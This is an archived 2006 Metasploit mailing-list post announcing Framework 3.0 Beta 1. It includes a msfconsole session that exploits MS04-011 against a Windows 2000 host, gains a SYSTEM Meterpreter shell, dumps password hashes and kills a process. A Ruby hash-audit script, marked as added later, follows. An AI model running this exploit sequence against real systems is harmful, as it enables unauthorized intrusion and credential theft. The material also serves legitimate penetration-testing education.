Metasploit mailing list archives
Metasploit Framework 3.0 Beta 1 (Almost!)
From: hdm at metasploit.com (H D Moore)
Date: Mon, 31 Jul 2006 03:20:31 -0500
Hi everyone,

We could use some help testing out the next version of the Metasploit Framework. If you could take a few minutes to download the release candidates below and send us your feedback, we would appreciate it. If everything goes well, the actual Beta-1 release of 3.0 will happen on the morning of August 2nd (Wednesday) at the Black Hat conference in Las Vegas.

If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com. Please keep all replies related to the beta release candidate off of the main framework mailing list in order to spare the bandwidth of those not interested.

Some quick highlights compared to version 2.6:

 - Smaller exploit set, since not everything has been ported
 - All modules are organized in a tree, versus flat lists
 - The Meterpreter payload is much smoother all around
 - New type of "passive" exploits (browser, sniffer, ids attacks)
 - Denial of service modules (ms05-035 and unpatched RRAS)
 - Support for multiple shells per exploit with passive modules

Unix users should use the following tarball:
 - http://metasploit.com/tools/framework-3.0-beta-1-rc1.tar.gz

Windows users should use the following installer:
 - http://metasploit.com/tools/framework-3.0-beta-1-rc1.exe

Unix users may need to install the openssl and zlib ruby modules for the Framework to load. If you are using Ubuntu, run the following commands:

 # apt-get install libzlib-ruby
 # apt-get install libopenssl-ruby

Users of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.

Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.

These RC1 installers will be removed as soon as the final version of Beta-1 becomes stable. Please read documentation/LICENSE for the new licensing terms of the Metasploit Framework (3.x only).

Thanks!
-HD

A quick demonstration of using msfconsole with meterpreter:

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
       =[ 4 aux

msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 -> 192.168.0.106:4444)
[*] The DCERPC service did not reply to our request
Loading extension stdapi...success.

meterpreter > getuid
Server username: SYSTEM

meterpreter > use priv
Loading extension priv...success.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WIN2000DC:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IWAM_WIN2000DC:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NetShowServices:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TsInternetUser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > cd c:\

meterpreter > ls

Listing: c:\
============

Mode              Size    Type  Last modified                 Name
----              ----    ----  -------------                 ----
100444/r--r--r--  0       fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0       fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0       dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0       dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195     fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416  fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]

meterpreter > ps

Process list
============

 PID   Name          Path
 ---   ----          ----
 176   smss.exe      \SystemRoot\System32\smss.exe
 200   csrss.exe     \??\C:\WINNT\system32\csrss.exe
 224   winlogon.exe  \??\C:\WINNT\system32\winlogon.exe
 252   services.exe  C:\WINNT\system32\services.exe
 264   lsass.exe     C:\WINNT\system32\lsass.exe
 440   svchost.exe   C:\WINNT\system32\svchost.exe
[ snip ]
 1804  wins.exe      C:\WINNT\System32\wins.exe
 2676  logon.scr     C:\WINNT\system32\logon.scr

meterpreter > kill 2676
Killing: 2676
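The hashdump output in the demonstration above is in pwdump format (user:RID:LM-hash:NT-hash:::), and every account in that dump carries the well-known hashes of an empty password. The Ruby script below is an added example, not part of the original post and not Metasploit code: it parses pwdump-format lines and flags the things a tester checks first after a dump (empty passwords, a stored LM hash, the same NT hash reused across accounts, and the built-in RID 500 Administrator). The sample input is constructed: the first two lines are copied from the post, the remaining accounts and their placeholder hex hashes are invented for the example.

```ruby
# Added example (not from the original post or from Metasploit): parse
# pwdump-format lines as printed by Meterpreter's "hashdump" and audit them.

# Well-known LM hash and NT hash of an empty password.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

# Constructed sample: the first two lines are from the post above; the
# svc_backup and jdoe accounts and their hex values are placeholders, not
# real hashes. The last line checks that junk is skipped.
SAMPLE_DUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1005:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
  jdoe:1006:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
  not a hashdump line
DUMP

PwdumpEntry = Struct.new(:user, :rid, :lm, :nt)

# Parse "user:rid:lmhash:nthash:::" lines; anything that does not match the
# format (prompt echoes, banners, blank lines) is dropped.
def parse_pwdump(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    fields = line.split(':', -1)
    next nil unless fields.length >= 4
    user, rid, lm, nt = fields[0, 4]
    next nil unless rid =~ /\A\d+\z/ && lm =~ /\A\h{32}\z/ && nt =~ /\A\h{32}\z/
    PwdumpEntry.new(user, rid.to_i, lm.downcase, nt.downcase)
  end.compact
end

# Returns { user => [finding symbols] } for every account with a finding.
#  :empty_password   NT hash is the hash of ""
#  :lm_hash_stored   a real LM hash is present (LM hashing enabled, password <= 14 chars)
#  :shared_password  the same non-empty NT hash appears on another account
#  :builtin_admin_rid RID 500, the built-in Administrator regardless of its name
def audit_hashes(entries)
  shared = entries.reject { |e| e.nt == EMPTY_NT }
                  .group_by(&:nt)
                  .select { |_, es| es.length > 1 }
                  .keys
  entries.each_with_object({}) do |e, findings|
    f = []
    f << :empty_password if e.nt == EMPTY_NT
    f << :lm_hash_stored if e.lm != EMPTY_LM
    f << :shared_password if shared.include?(e.nt)
    f << :builtin_admin_rid if e.rid == 500
    findings[e.user] = f unless f.empty?
  end
end

if $PROGRAM_NAME == __FILE__
  audit_hashes(parse_pwdump(SAMPLE_DUMP)).each do |user, findings|
    puts "#{user}: #{findings.join(', ')}"
  end
end
```

Pipe a saved hashdump into parse_pwdump and hand the result to audit_hashes; every account in the post's own dump would come back as :empty_password, which is the first thing worth reporting from that host.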